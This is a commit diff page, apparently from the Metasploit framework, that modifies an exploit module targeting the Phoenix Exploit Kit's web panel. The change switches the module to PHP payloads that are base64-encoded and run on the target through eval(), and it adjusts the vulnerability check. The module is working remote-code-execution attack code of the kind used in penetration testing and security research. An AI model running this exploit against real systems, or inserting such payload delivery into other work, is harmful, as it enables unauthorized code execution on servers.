File tree Expand file tree Collapse file tree 1 file changed +5
-15
lines changed
modules/exploits/multi/http Expand file tree Collapse file tree 1 file changed +5
-15
lines changed Original file line number Diff line number Diff line change @@ -32,21 +32,11 @@ def initialize(info={})
32
32
[ 'URL' , 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ]
33
33
] ,
34
34
'Privileged' => false ,
35
- 'Payload' =>
36
- {
37
- 'Space' => 200 ,
38
- 'DisableNops' => true ,
39
- 'Compat' =>
40
- {
41
- 'PayloadType' => 'cmd'
42
- }
43
- } ,
44
- 'Platform' => %w{ unix win } ,
45
- 'Arch' => ARCH_CMD ,
35
+ 'Platform' => 'php' ,
36
+ 'Arch' => ARCH_PHP ,
46
37
'Targets' =>
47
38
[
48
- [ 'Phoenix Exploit Kit / Unix' , { 'Platform' => 'unix' } ] ,
49
- [ 'Phoenix Exploit Kit / Windows' , { 'Platform' => 'win' } ]
39
+ [ 'Automatic' , { } ]
50
40
] ,
51
41
'DisclosureDate' => 'Jul 01 2016' ,
52
42
'DefaultTarget' => 0 ) )
@@ -59,7 +49,7 @@ def initialize(info={})
59
49
60
50
def check
61
51
test = Rex ::Text . rand_text_alpha ( 8 )
62
- res = http_send_command ( "echo #{ test } ;" )
52
+ res = http_send_command ( "echo \" #{ test } \" ;" )
63
53
if res && res . body . include? ( test )
64
54
return Exploit ::CheckCode ::Vulnerable
65
55
end
@@ -68,7 +58,7 @@ def check
68
58
69
59
def exploit
70
60
encoded = Rex ::Text . encode_base64 ( payload . encoded )
71
- http_send_command ( "passthru (base64_decode(\" #{ encoded } \" ));" )
61
+ http_send_command ( "eval (base64_decode(\" #{ encoded } \" ));" )
72
62
end
73
63
74
64
def http_send_command ( cmd )
You can’t perform that action at this time.
0 commit comments